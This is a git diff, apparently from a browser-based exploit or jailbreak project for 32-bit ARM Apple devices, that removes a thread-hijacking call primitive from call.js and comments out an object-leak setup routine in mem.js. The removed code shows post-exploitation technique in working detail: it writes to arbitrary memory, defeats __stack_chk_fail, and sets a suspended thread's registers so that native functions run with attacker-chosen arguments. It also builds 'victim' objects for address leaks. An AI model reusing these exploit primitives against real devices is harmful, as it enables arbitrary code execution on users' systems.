Diffstat (limited to 'src/js/primitives')
-rw-r--r--src/js/primitives/call.js94
-rw-r--r--src/js/primitives/mem.js3
2 files changed, 2 insertions, 95 deletions
diff --git a/src/js/primitives/call.js b/src/js/primitives/call.js
index a581c91..74a20d8 100644
--- a/src/js/primitives/call.js
+++ b/src/js/primitives/call.js
@@ -158,100 +158,6 @@ function symaddr(sym) {
return addy;
}
-function callnarg_new() {
- if (arguments.length < 1) {
- return printf("error: tried to run callnarg without args. arguments.length=%d\n", arguments.length);
- }
-
- var stack_shit = 0x161000;
-
- /*
- * setup ptrs
- */
- write_u32(countptr, count);
- write_u32(thptr, th);
- write_u32(threadptr, thread);
- write_u32(thread_stateptr, thread_state);
-
- write_u32(countptrptr, countptr);
- write_u32(thptrptr, thptr);
- write_u32(threadptrptr, threadptr);
- write_u32(thread_stateptrptr, thread_stateptr);
-
- var addy = arguments[0];
- var dyld_shc_slide = get_dyld_shc_slide();
-
- /*
- * make __stack_chk_fail infinite loop
- * (works by setting its lazy addy to its resolver, thus the resolver just
- * endlessly jumps to iself)
- */
- write_u32(__stack_chk_fail_lazy_addy + dyld_shc_slide, __stack_chk_fail_resolver + dyld_shc_slide);
-
- /*
- * if the thread doesn't exist, create it.
- */
- calls4arg("pthread_create", threadptr, 0, __stack_chk_fail_resolver + dyld_shc_slide, 0);
- thread = read_u32(threadptr);
- write_u32(th, calls4arg("pthread_mach_thread_np", thread, 0, 0, 0));
- rth = read_u32(th);
- calls4arg("thread_suspend", rth, 0, 0, 0);
-
- if (pthread_ret == 0) {
- pthread_ret = malloc(4);
- }
-
- /*
- * write first 4 to r0-r3, rest to stack
- */
- for (var i = 1; i < arguments.length; i++) {
- if (i <= 4) {
- write_u32(thread_state + ((i - 1) << 2), arguments[i]);
- } else {
- write_u32(stack_shit + ((i - 5) << 2), arguments[i]);
- }
- }
-
- var stack_shit_ret_offset = 0x58;
-
- write_u32(stack_shit + stack_shit_ret_offset, pthread_exit + dyld_shc_slide);
-
- /*
- * stack
- */
- write_u32(thread_state + (13 << 2), stack_shit);
-
- /*
- * return address, infinite loop
- */
- write_u32(thread_state + (14 << 2), add_sp_0x3c + dyld_shc_slide);
-
- /*
- * pc
- */
- write_u32(thread_state + (15 << 2), addy);
-
- /*
- * cpsr, magic
- */
- if (addy & 1) {
- write_u32(thread_state + (16 << 2), 0x40000020);
- } else {
- write_u32(thread_state + (16 << 2), 0x40000000);
- }
-
- /*
- * set the state
- */
- calls4arg("thread_set_state", rth, ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT);
- calls4arg("thread_resume", rth, 0, 0, 0);
-
- calls4arg("pthread_join", thread, pthread_ret, 0, 0);
- write_u32(count, 17);
- calls4arg("thread_get_state", rth, ARM_THREAD_STATE, thread_state, count);
- return read_u32(pthread_ret);
-}
-
function callnarg() {
if (arguments.length < 1) {
return printf("error: tried to run callnarg without args. arguments.length=%d\n", arguments.length);
diff --git a/src/js/primitives/mem.js b/src/js/primitives/mem.js
index 0c03090..d664e7b 100644
--- a/src/js/primitives/mem.js
+++ b/src/js/primitives/mem.js
@@ -308,12 +308,13 @@ var jsobj_addr;
var large_buf = new Uint32Array(0x100000);
var large_buf_ptr = 0;
+/*
function prep_shit() {
string_ref = scall("JSStringCreateWithUTF8CString", "victim");
global_object = scall("JSContextGetGlobalObject", read_u32(slid + reserve_addr + 0x44));
jsobj_addr = scall("JSObjectGetProperty", read_u32(slid + reserve_addr + 0x44), global_object, string_ref, NULL);
large_buf_ptr = leak_vec(large_buf);
-}
+}*/
function addrof(obj) {
victim.target = obj;